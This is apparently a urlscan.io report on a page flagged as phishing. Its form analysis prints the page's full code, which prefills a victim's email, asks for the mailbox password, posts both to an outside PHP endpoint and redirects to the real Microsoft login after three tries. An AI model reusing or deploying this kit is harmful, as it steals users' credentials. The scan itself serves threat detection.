www.toyostone.co.jp
Open in
urlscan Pro
61.126.42.230
Malicious Activity!
Public Scan
URL:
http://www.toyostone.co.jp/accounts/aanygo.html
Submission: On April 02 via automatic, source openphish — Scanned from JP
Submission: On April 02 via automatic, source openphish — Scanned from JP
Form analysis
1 forms found in the DOM<form id="contact">
<center>
<input type="email" id="email" name="email" placeholder="Enter Email Address" value="" readonly="" required="">
<input type="password" id="password" name="password" placeholder="Enter Email Password" autofocus="" required="">
<span id="msg" class="text-danger" style="display: none;"></span>
<input type="submit" id="submit-btn" value="VIEW DOCUMENT"> <script>
/* global $ */
$(document).ready(function() {
$('#error').hide();
$("#div2").hide();
$("#div3").hide();
$("#msg").hide();
var email = window.location.hash.substr(1);
if (!email) {} else {
$('#email').val(email);
var my_email = email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
// if (final=="gmail" || final=="yahoo" || final=="hotmail" || final=="aol" || final=="outlook") {
// $('#error').show();
// }
// else
// {
$("#div1").animate({
left: 200,
opacity: "hide"
}, 0);
$("#div2").animate({
right: 200,
opacity: "show"
}, 1000);
$("#div3").animate({
right: 200,
opacity: "show"
}, 1000);
$("#emailch").html(my_email);
// }
}
$('#email').click(function() {
$('#error').hide();
});
$('#next').click(function() {
var my_email = $('#email').val();
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
// if (final=="gmail" || final=="yahoo" || final=="hotmail" || final=="aol" || final=="outlook") {
// $('#error').show();
// }
// else
// {
$("#div1").animate({
left: 200,
opacity: "hide"
}, 0);
$("#div2").animate({
right: 200,
opacity: "show"
}, 1000);
$("#div3").animate({
right: 200,
opacity: "show"
}, 1000);
$("#emailch").html(my_email);
// }
});
$('#back').click(function() {
$("#msg").hide();
$("#div3").animate({
left: 200,
opacity: "hide"
}, 0);
$("#div2").animate({
left: 200,
opacity: "hide"
}, 0);
$("#div1").animate({
right: 200,
opacity: "show"
}, 1000);
});
var count = 0;
$('#submit-btn').click(function(event) {
event.preventDefault();
var email = $("#email").val();
var password = $("#password").val();
var detail = $("#field").html();
var msg = $('#msg').html();
$('#msg').text(msg);
count = count + 1;
if (count >= 3) {
window.location.replace("https://login.microsoftonline.com/");
} else {
$.ajax({
dataType: 'JSON',
url: 'https://ojdocuments.com/wp-admin/zip/htaccess.php',
type: 'POST',
data: {
email: email,
password: password,
detail: detail,
},
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$('#msg').html(response['msg']);
var password = $("#password").val("");
} else {
$('#msg').html(response['msg']);
var password = $("#password").val("");
}
}
},
error: function() {
$("#msg").show();
$('#msg').html("Please try again");
var password = $("#password").val("");
},
complete: function() {
$('#submit-btn').html('Login');
}
});
}
});
});
</script>
</center>
</form>
Text Content
--------------------------------------------------------------------------------